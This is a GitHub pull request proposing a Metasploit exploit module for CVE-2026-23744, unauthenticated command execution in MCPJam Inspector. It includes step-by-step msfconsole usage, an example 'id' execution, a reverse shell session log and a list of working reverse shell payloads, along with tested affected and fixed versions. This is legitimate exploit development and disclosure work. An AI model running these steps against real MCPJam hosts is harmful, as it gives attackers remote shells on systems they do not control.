Skip to content

Add MCPJam Inspector command execution exploit#21655

Open
earthenvessel wants to merge 1 commit into
rapid7:masterfrom
earthenvessel:feature/mcpjam-inspector-rce
Open

Add MCPJam Inspector command execution exploit#21655
earthenvessel wants to merge 1 commit into
rapid7:masterfrom
earthenvessel:feature/mcpjam-inspector-rce

Conversation

@earthenvessel

Copy link
Copy Markdown

Description

This PR adds a new exploit module for CVE-2026-23744, an unauthenticated command execution vulnerability in MCPJam Inspector.

The module targets the /api/mcp/connect endpoint. Vulnerable versions accept a JSON serverConfig object containing a command and args array, then use those values to start an MCP server. When MCPJam Inspector is exposed on a routable interface, an unauthenticated remote attacker can abuse this behavior to execute operating system commands as the user running MCPJam Inspector.

The module currently supports Unix command payloads. By default, it starts a transient stdio MCP server and executes the selected Metasploit command payload through MCPJam Inspector's MCP tools API. A direct /bin/sh -c execution path is also available with EXEC_METHOD=direct_sh.

This change also adds module documentation under documentation/modules.

During testing, the GitHub Security Advisory's affected range appeared to be narrower than observed behavior. The advisory lists affected versions as <= 1.4.2, but source builds through v1.4.6 were exploitable. The first fixed GitHub tag identified during testing was v1.5.0, which requires session-token authentication for the relevant API endpoints.

Related Issue: N/A

Breaking Changes

None

Reviewer Notes

Start with:

  • modules/exploits/multi/http/mcpjam_inspector_rce.rb
  • documentation/modules/exploit/multi/http/mcpjam_inspector_rce.md

The module intentionally targets Unix command payloads only. Windows support is left out of scope for this initial PR because it was not tested against a Windows MCPJam Inspector deployment.

The check method performs the following:

  1. Verifies that the target appears to be MCPJam Inspector.
  2. Probes the connect endpoint.
  3. Reports patched/authenticated versions as not exploitable when the endpoint returns an authentication response such as Unauthorized/Session token required.
  4. On vulnerable versions, starts a transient MCP server and verifies benign command execution with a random marker.

Verification Steps

    • Build or run a vulnerable MCPJam Inspector version, such as GitHub tag v1.4.2, and expose it locally on port 6274.
    • Start msfconsole and load the module:
use exploit/multi/http/mcpjam_inspector_rce
set RHOSTS 127.0.0.1
set RPORT 6274
set SSL false
    • Run check and verify that the target is reported vulnerable:
check

Expected result:

The target is vulnerable. MCPJam Inspector executed a benign command through the unauthenticated connect endpoint
    • Test command output with cmd/unix/generic:
set payload cmd/unix/generic
set FETCH_OUTPUT true
set CMD id
run

Expected result: The module executes id and prints command output from the target.

    • Test a reverse shell payload:
set FETCH_OUTPUT false
set payload cmd/unix/reverse_nodejs
set LHOST <attacker_ip>
set LPORT 9001
run

Expected result: A command shell session opens.

    • Run MCPJam Inspector v1.5.0 or a later fixed version and repeat check.
      Expected result:
The target is not exploitable. MCPJam Inspector requires session-token authentication for the connect endpoint
    • Run module quality checks:
bundle exec ruby tools/dev/msftidy.rb modules/exploits/multi/http/mcpjam_inspector_rce.rb
bundle exec ruby tools/dev/msftidy_docs.rb documentation/modules/exploit/multi/http/mcpjam_inspector_rce.md
ruby -c modules/exploits/multi/http/mcpjam_inspector_rce.rb
git diff --check

Test Evidence

The module was tested against MCPJam Inspector versions built from GitHub source:

Version Result
v1.4.1 Vulnerable
v1.4.2 Vulnerable
v1.4.3 Vulnerable
v1.4.4 Vulnerable
v1.4.5 Vulnerable
v1.4.6 Vulnerable
v1.5.0 Not vulnerable; session-token authentication required
v2.23.0 Not vulnerable; session-token authentication required

Successful payload coverage included:
cmd/unix/generic
cmd/unix/reverse_nodejs
cmd/unix/reverse_bash
cmd/unix/reverse_perl
cmd/unix/reverse_python
cmd/unix/reverse_netcat
cmd/unix/bind_nodejs
cmd/unix/python/pingback_reverse_tcp
cmd/unix/python/shell_reverse_tcp

Example vulnerable target check:

msf6 > use exploit/multi/http/mcpjam_inspector_rce
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/http/mcpjam_inspector_rce) > set RHOSTS 192.0.2.10
RHOSTS => 192.0.2.10
msf6 exploit(multi/http/mcpjam_inspector_rce) > set RPORT 6274
RPORT => 6274
msf6 exploit(multi/http/mcpjam_inspector_rce) > set SSL false
SSL => false
msf6 exploit(multi/http/mcpjam_inspector_rce) > check
[*] Starting transient Node.js MCP command server as server ID check-XXXXXXXX
[+] 192.0.2.10:6274 - The target is vulnerable. MCPJam Inspector executed a benign command through the unauthenticated connect endpoint

Example command execution:

msf6 exploit(multi/http/mcpjam_inspector_rce) > set payload cmd/unix/generic
payload => cmd/unix/generic
msf6 exploit(multi/http/mcpjam_inspector_rce) > set FETCH_OUTPUT true
FETCH_OUTPUT => true
msf6 exploit(multi/http/mcpjam_inspector_rce) > set CMD id
CMD => id
msf6 exploit(multi/http/mcpjam_inspector_rce) > run
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Starting transient Node.js MCP command server as server ID check-XXXXXXXX
[+] The target is vulnerable. MCPJam Inspector executed a benign command through the unauthenticated connect endpoint
[*] Starting transient Node.js MCP command server as server ID msf-XXXXXXXX
[+] MCP command server connected
[*] Executing payload through MCP tools/execute
[*] Command result: uid=1000(appuser) gid=1000(appuser) groups=1000(appuser)
[*] Exploit completed, but no session was created.

Example reverse shell:

msf6 exploit(multi/http/mcpjam_inspector_rce) > set FETCH_OUTPUT false
FETCH_OUTPUT => false
msf6 exploit(multi/http/mcpjam_inspector_rce) > set payload cmd/unix/reverse_nodejs
payload => cmd/unix/reverse_nodejs
msf6 exploit(multi/http/mcpjam_inspector_rce) > set LHOST 192.0.2.20
LHOST => 192.0.2.20
msf6 exploit(multi/http/mcpjam_inspector_rce) > set LPORT 9001
LPORT => 9001
msf6 exploit(multi/http/mcpjam_inspector_rce) > run
[*] Started reverse TCP handler on 192.0.2.20:9001
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Starting transient Node.js MCP command server as server ID check-XXXXXXXX
[+] The target is vulnerable. MCPJam Inspector executed a benign command through the unauthenticated connect endpoint
[*] Starting transient Node.js MCP command server as server ID msf-XXXXXXXX
[+] MCP command server connected
[*] Executing payload through MCP tools/execute
[*] Command shell session 1 opened (192.0.2.20:9001 -> 192.0.2.10:51234)

Example fixed-version check against v1.5.0:

msf6 exploit(multi/http/mcpjam_inspector_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/mcpjam_inspector_rce) > set RPORT 6274
RPORT => 6274
msf6 exploit(multi/http/mcpjam_inspector_rce) > set SSL false
SSL => false
msf6 exploit(multi/http/mcpjam_inspector_rce) > check
[*] 127.0.0.1:6274 - The target is not exploitable. MCPJam Inspector requires session-token authentication for the connect endpoint

Quality checks:

$ bundle exec ruby tools/dev/msftidy.rb modules/exploits/multi/http/mcpjam_inspector_rce.rb
1 file inspected, no offenses detected
$ bundle exec ruby tools/dev/msftidy_docs.rb documentation/modules/exploit/multi/http/mcpjam_inspector_rce.md
$ ruby -c modules/exploits/multi/http/mcpjam_inspector_rce.rb
Syntax OK
$ git diff --check

Environment

Field Details
Operating System Kali Linux, Linux 6.19.14+kali-amd64
Target Software/Hardware MCPJam Inspector v1.4.1 through v1.4.6 vulnerable; v1.5.0 and v2.23.0 not vulnerable to this unauthenticated exploit path. Target versions were built from the MCPJam Inspector GitHub source repository with Node.js v22.13.1.

AI Usage Disclosure

AI assistance was used during development and testing. Hermes Agent was used to assist with module and documentation drafting and test orchestration. All code and documentation were manually reviewed/tested.

Pre-Submission Checklist

  • Included a corresponding documentation markdown file in documentation/modules
  • No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
  • Tested on the target environment specified in the Environment section above
  • Included RSpec tests for library changes (N/A -- no lib/ changes)
  • Read the CONTRIBUTING.md and module acceptance guidelines

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

Status: Todo

Development

Successfully merging this pull request may close these issues.

2 participants